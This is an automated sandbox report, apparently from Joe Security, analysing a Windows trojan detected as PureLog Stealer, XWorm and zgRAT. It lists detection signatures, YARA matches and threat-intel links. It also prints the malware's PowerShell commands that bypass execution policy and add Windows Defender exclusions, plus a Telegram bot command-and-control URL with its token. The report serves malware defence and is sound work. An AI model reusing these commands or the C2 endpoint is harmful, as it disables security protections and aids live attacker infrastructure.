Edit tour

Windows Analysis Report
9NBx4Vmiuj.exe

Overview

General Information

Sample name:	9NBx4Vmiuj.exe renamed because original name is a hash value
Original sample name:	1d562eaa3e33451a40f60c976c6f4bc0.exe
Analysis ID:	1416004
MD5:	1d562eaa3e33451a40f60c976c6f4bc0
SHA1:	de0f3e027e12162388ec953936857f06b71487ca
SHA256:	dde68755fa515158e01e3e8f2b90772dc86e25b7e2684fc5066a5e33ee22b614
Tags:	64exetrojan
Infos:

Detection

PureLog Stealer, XWorm, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected AntiVM3

Yara detected PureLog Stealer

Yara detected Telegram RAT

Yara detected XWorm

Yara detected zgRAT

.NET source code contains potential unpacker

.NET source code contains very large array initializations

Adds a directory exclusion to Windows Defender

Bypasses PowerShell execution policy

Connects to many ports of the same IP (likely port scanning)

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Modifies the context of a thread in another process (thread injection)

Protects its processes via BreakOnTermination flag

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Script Execution From Temp Folder

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Yara detected Costura Assembly Loader

Yara detected Generic Downloader

Yara detected PersistenceViaHiddenTask

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates COM task schedule object (often to register a task for autostart)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file does not import any functions

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Powershell Defender Exclusion

Sigma detected: Startup Folder File Write

Stores files to the Windows start menu directory

Tries to load missing DLLs

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

9NBx4Vmiuj.exe (PID: 7060 cmdline: "C:\Users\user\Desktop\9NBx4Vmiuj.exe" MD5: 1D562EAA3E33451A40F60C976C6F4BC0)

TypeId.exe (PID: 1248 cmdline: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe MD5: 1D562EAA3E33451A40F60C976C6F4BC0)

RegSvcs.exe (PID: 348 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe MD5: DC67ADE51149EC0C373A379473895BA1)

btjxg.exe (PID: 1784 cmdline: "C:\Users\user\AppData\Local\Temp\btjxg.exe" MD5: 2649EF15CF6004B05C80ABD825CD594E)

powershell.exe (PID: 2284 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\btjxg.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7444 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'btjxg.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7704 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\btjxg.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

TypeId.exe (PID: 7224 cmdline: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe MD5: 1D562EAA3E33451A40F60C976C6F4BC0)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot5498061286:AAEOFPFhizSA_AbkzDV_OWcHlXVsegPpL_c/sendMessage"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x228bb:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x22958:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x22a6d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x223bb:$cnc4: POST / HTTP/1.1

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\btjxg.exe	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
C:\Users\user\AppData\Local\Temp\btjxg.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Users\user\AppData\Local\Temp\btjxg.exe	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x87e2:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x887f:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x8994:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x8374:$cnc4: POST / HTTP/1.1
C:\ProgramData\btjxg.exe	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
C:\ProgramData\btjxg.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\ProgramData\btjxg.exe	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x87e2:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x887f:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x8994:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x8374:$cnc4: POST / HTTP/1.1
Click to see the 1 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000002.2610110087.0000020937418000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.2126079355.000002341C890000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000002.00000002.2158779274.000002184E8F8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.2135818855.00000234355C7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PersistenceViaHiddenTask	Yara detected PersistenceViaHiddenTask	Joe Security
00000007.00000002.2610110087.0000020937300000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000003.00000002.3409147293.000001E3C92B6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000003.00000002.3409147293.000001E3C92B6000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x8aca:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x2dd02:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x8b67:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x2dd9f:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x8c7c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x2deb4:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x865c:$cnc4: POST / HTTP/1.1 0x2d894:$cnc4: POST / HTTP/1.1
00000004.00000002.3382459280.0000000013071000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000004.00000002.3382459280.0000000013071000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x112a2:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x1133f:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x11454:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x10e34:$cnc4: POST / HTTP/1.1
00000003.00000002.3409147293.000001E3C9938000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000003.00000002.3376937115.000001E3B9201000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.2128727924.000002342CE13000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.2128727924.000002342CE13000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.2126196926.000002341C991000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000003.00000002.3409147293.000001E3C9848000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.2128727924.000002342CC3B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000007.00000002.2591573237.0000020926CE1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000002.00000002.2150448933.000002183E1C1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000003.00000002.3409147293.000001E3C9898000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000002.00000002.2158779274.000002184E858000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000004.00000002.3374102569.000000000310C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000007.00000002.2610110087.0000020937378000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000002.00000002.2158779274.000002184E7E0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000007.00000002.2610110087.0000020937328000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000002.00000002.2158779274.000002184E808000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000003.00000002.3409147293.000001E3C9820000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.2132514547.0000023435160000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
00000000.00000002.2132514547.0000023435160000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.2132514547.0000023435160000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x9fbfe:$s1: file:/// 0x9fb0e:$s2: {11111-22222-10009-11112} 0x9fb8e:$s3: {11111-22222-50001-00000} 0x98922:$s4: get_Module 0x98da3:$s5: Reverse 0x9ec54:$s6: BlockCopy 0x9f5be:$s7: ReadByte 0x9fc10:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
00000000.00000002.2128727924.000002342D0C8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000004.00000000.2204688783.0000000000DE2000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000004.00000000.2204688783.0000000000DE2000.00000002.00000001.01000000.00000008.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x85e2:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x867f:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x8794:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x8174:$cnc4: POST / HTTP/1.1
Process Memory Space: 9NBx4Vmiuj.exe PID: 7060	JoeSecurity_PersistenceViaHiddenTask	Yara detected PersistenceViaHiddenTask	Joe Security
Process Memory Space: 9NBx4Vmiuj.exe PID: 7060	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: TypeId.exe PID: 1248	JoeSecurity_PersistenceViaHiddenTask	Yara detected PersistenceViaHiddenTask	Joe Security
Process Memory Space: TypeId.exe PID: 1248	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: RegSvcs.exe PID: 348	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: RegSvcs.exe PID: 348	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: btjxg.exe PID: 1784	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: btjxg.exe PID: 1784	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: powershell.exe PID: 2284	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: TypeId.exe PID: 7224	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: powershell.exe PID: 7444	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: powershell.exe PID: 7704	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 39 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.TypeId.exe.2184e8f82a0.2.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
2.2.TypeId.exe.2184e7e01f8.7.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
3.2.RegSvcs.exe.1e3c98201f8.10.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
7.2.TypeId.exe.20937378268.2.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
2.2.TypeId.exe.2184e858268.12.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
7.2.TypeId.exe.20937328230.9.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
3.2.RegSvcs.exe.1e3c98201f8.10.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
7.2.TypeId.exe.209374182a0.7.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
7.2.TypeId.exe.20926dfd5f0.0.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
3.2.RegSvcs.exe.1e3c92b62e8.12.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
3.2.RegSvcs.exe.1e3c92b62e8.12.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x69e2:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6a7f:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6b94:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6574:$cnc4: POST / HTTP/1.1
0.2.9NBx4Vmiuj.exe.2342cfb01f8.12.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
2.2.TypeId.exe.2184e7e01f8.7.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
2.2.TypeId.exe.2184e808230.3.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
3.2.RegSvcs.exe.1e3c9898268.11.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
3.2.RegSvcs.exe.1e3c99382a0.1.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
3.2.RegSvcs.exe.1e3c9848230.3.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.9NBx4Vmiuj.exe.2342cfd8230.6.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
7.2.TypeId.exe.209373001f8.4.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.9NBx4Vmiuj.exe.23435160000.14.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.2.9NBx4Vmiuj.exe.23435160000.14.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.9NBx4Vmiuj.exe.23435160000.14.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x9fbfe:$s1: file:/// 0x9fb0e:$s2: {11111-22222-10009-11112} 0x9fb8e:$s3: {11111-22222-50001-00000} 0x98922:$s4: get_Module 0x98da3:$s5: Reverse 0x9ec54:$s6: BlockCopy 0x9f5be:$s7: ReadByte 0x9fc10:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
3.2.RegSvcs.exe.1e3c92db520.4.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
3.2.RegSvcs.exe.1e3c92db520.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
3.2.RegSvcs.exe.1e3c92db520.4.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x87e2:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x887f:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x8994:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x8374:$cnc4: POST / HTTP/1.1
3.2.RegSvcs.exe.1e3c92db520.4.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
3.2.RegSvcs.exe.1e3c92db520.4.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x69e2:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6a7f:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6b94:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6574:$cnc4: POST / HTTP/1.1
7.2.TypeId.exe.20937328230.9.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
3.2.RegSvcs.exe.1e3c92b62e8.12.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
3.2.RegSvcs.exe.1e3c92b62e8.12.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
3.2.RegSvcs.exe.1e3c92b62e8.12.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x87e2:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x2da1a:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x887f:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x2dab7:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x8994:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x2dbcc:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x8374:$cnc4: POST / HTTP/1.1 0x2d5ac:$cnc4: POST / HTTP/1.1
2.2.TypeId.exe.2184e808230.3.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
3.2.RegSvcs.exe.1e3c9848230.3.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
4.2.btjxg.exe.13079ac0.1.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
4.2.btjxg.exe.13079ac0.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
4.2.btjxg.exe.13079ac0.1.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x87e2:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x887f:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x8994:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x8374:$cnc4: POST / HTTP/1.1
4.0.btjxg.exe.de0000.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
4.0.btjxg.exe.de0000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
4.0.btjxg.exe.de0000.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x87e2:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x887f:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x8994:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x8374:$cnc4: POST / HTTP/1.1
7.2.TypeId.exe.209373001f8.4.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
4.2.btjxg.exe.13079ac0.1.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
4.2.btjxg.exe.13079ac0.1.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x69e2:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6a7f:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6b94:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6574:$cnc4: POST / HTTP/1.1
0.2.9NBx4Vmiuj.exe.2342cd134c8.4.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.2.9NBx4Vmiuj.exe.2342cd134c8.4.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
